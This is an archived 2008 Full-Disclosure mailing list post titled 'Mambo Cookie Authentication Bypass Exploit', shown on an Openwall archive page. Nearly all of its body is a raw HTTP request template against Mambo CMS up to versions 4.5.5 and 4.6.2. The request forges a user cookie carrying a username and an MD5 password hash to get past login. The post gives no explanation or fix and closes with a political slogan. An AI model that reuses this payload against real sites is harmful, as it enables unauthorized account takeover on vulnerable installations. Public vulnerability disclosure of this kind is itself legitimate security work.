lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 8 Jun 2008 13:29:56 +0200
From: "Halabaluza Team Halabaluza Team" <halabaluza.team@...il.com>
To: halabaluza.team@...il.com
Subject: Mambo Cookie Authentication Bypass Exploit

for mambo <= 4.5.5 and <= 4.6.2 maybe others

GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0

FREE TIBET!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ